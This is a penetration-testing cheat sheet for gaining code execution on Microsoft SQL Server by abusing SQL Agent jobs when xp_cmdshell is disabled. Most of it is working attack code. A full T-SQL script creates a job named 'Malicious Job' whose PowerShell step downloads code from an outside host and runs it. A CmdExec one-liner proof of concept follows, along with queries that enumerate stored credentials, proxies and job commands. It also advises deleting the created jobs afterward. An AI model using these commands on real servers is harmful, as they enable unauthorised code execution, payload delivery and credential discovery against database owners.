Use for job-based RCE when xp_cmdshell is disabled.
Jobs are comparable to scheduled tasks, and are intended to be used by database admins to automate tasks related to the database server.
Tasks use subsystems, some of which are also CmdExec and PowerShell subsystems which may be used to execute commands and PowerShell scripts respectively.
- use the sp_start_job stored procedure to start the job immediately
- remove any
jobsyou created with the sp_delete_job stored procedure
RCE via Job
Full Script:
USE msdb;
GO
EXEC sp_add_job
@job_name = N'Malicious Job';
GO
EXEC sp_add_jobstep
@job_name = N'Malicious Job',
@step_name = N'Execute PowerShell Script',
@subsystem = N'PowerShell',
@command = N'(New-Object Net.WebClient).DownloadString("http://10.10.14.104/a")|IEX;',
@retry_attempts = 5,
@retry_interval = 5;
GO
EXEC sp_add_jobserver
@job_name = N'Malicious Job';
GO
EXEC sp_start_job
@job_name = N'Malicious Job';
GO
Build with one-liners:
EXEC msdb.dbo.sp_add_job @job_name='poc_job';
EXEC msdb.dbo.sp_add_jobstep @job_name='poc_job',@step_name='poc',@subsystem='CMDEXEC',@command='cmd /c whoami > C:\agent.txt';
EXEC msdb.dbo.sp_add_jobserver @job_name='poc_job';
EXEC msdb.dbo.sp_start_job @job_name='poc_job';
Enumerate credentials
SELECT * FROM msdb.dbo.syscredentials;
SELECT p.proxy_id,p.name,c.name FROM msdb.dbo.sysproxies p LEFT JOIN msdb.dbo.syscredentials c ON p.credential_id=c.credential_id;
SELECT j.job_id,j.name,s.step_id,s.subsystem,s.command FROM msdb.dbo.sysjobs j JOIN msdb.dbo.sysjobsteps s ON j.job_id=s.job_id;